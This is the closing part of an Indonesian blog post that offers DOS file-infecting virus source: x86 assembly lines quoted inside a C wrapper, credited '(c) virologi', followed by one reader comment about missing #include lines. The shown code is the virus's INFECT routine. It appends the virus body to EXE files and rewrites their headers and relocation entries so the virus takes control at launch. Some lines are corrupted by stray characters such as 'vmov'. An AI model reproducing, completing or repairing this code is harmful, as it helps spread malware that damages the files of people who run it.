"ret"
"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"
"int 21H"
"mov cx,OFFSET FINAL"
"xor dx,dx"
"mov ah,40H"
"int 21H"
"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"
"adc cx,0v"
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"
"mov cx,10"
"mov ah,40H"
"int 21H"
"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"
"int 21H"
"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"
"sub ax,WORD PTR [EXE_HDR+8]"
"mov WORD PTR [EXE_HDR+22],ax"
"mov WORD PTR [EXE_HDR+14],ax"
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE"
"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"vmov ax,WORD PTR [EXE_HDR+6]"
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"
"mov WORD PTR [EXE_HDR],OFFSET HOSTS"
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2"
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"mov ah,3EH"
"int 21H"
"ret"
"FINAL:"
"VSEG ENDS"
"END VIRUS"
);
//end ASM code
return 0;
}
(c) virologi
Postingan
1 komentar:
Assalamualaikum. Mas itu kok di bagian
#include
tidak ada file yang disertakan sih. Tolong diperbaiki lagi untuk artikel yang lebih baik. Terima Kasih.
Posting Komentar